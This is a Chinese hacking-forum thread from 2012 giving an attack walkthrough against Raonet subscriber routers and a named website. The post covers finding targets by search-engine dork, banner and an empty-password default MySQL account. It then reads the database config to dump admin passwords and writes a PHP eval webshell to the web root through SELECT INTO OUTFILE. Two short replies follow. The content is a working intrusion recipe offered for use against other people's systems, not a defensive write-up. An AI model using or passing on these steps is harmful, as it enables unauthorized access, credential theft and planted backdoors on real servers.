找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2800|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
5 S$ R% {3 O, L# G/ A& a. Y3 Y# t6 A4 n- m! Y3 d* s. b
1:google搜索'Raonet Subscriber Ethernet Router'
) Z$ O" _3 I& G' m; K1 Q: t! n' U) k: }2 Y4 t! @9 d% @
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001$ G+ D0 u" R3 r$ `$ R( c! F6 e

* k/ ^6 ]) I9 d0 L. c" `! e1 }, ?3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。. m0 ]7 I6 E$ D
* W( {6 z; `; M* G; `
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......+ E' b# o; z- {% f8 {1 D

# L) o# ~- e- A5 o3 A# j
8 \) F5 g. h& J. W- W# [1 b# A
8 p8 I( S/ O; P3 A入侵步骤:
$ U# E+ `% E# X% O$ E  r  b! Q
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
5 s- G. M4 W+ B" \9 Z
/ _- G7 R+ D$ W+ w3 q7 r2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc+ o+ P) Z) N" V2 z& }/ k% X6 G. V: w$ B
3:得到密码后连接,查看GUI管理密码:
% S+ V( _$ ~0 euse ser_500
. @( X3 n( B% R0 i! s# tselect id,passwd from user;0 K- q# g' E/ l; F+ i/ q1 V: I* g
4:通过数据库写入webshell,执行命令:- y2 m( s! z' }) d5 F* ?$ ~' B/ h! E
use mysql;
7 h' q# H2 I4 e& Ccreate table ok(cmd TEXT);0 e# p8 V: o+ i; f' y
insert into ok values("<?php @eval($_POST[cmd])?>");$ R% P1 l: G8 w: c5 Z7 g
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";0 z' T+ E9 Y+ _% I' _# @. K
drop table ok;
0 _- Q* ^7 i( J6 q0 B
" [7 x/ I$ y& Y# o9 p2 J6 ]2 B5:连接后门shell.php
: c& i8 T. X9 `8 G; d
# j! @4 U/ X2 G( P6 c6. 搞定!
: q" J( v! ~" a
- T5 a, m5 m' ~/ v8 O  Z' U
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表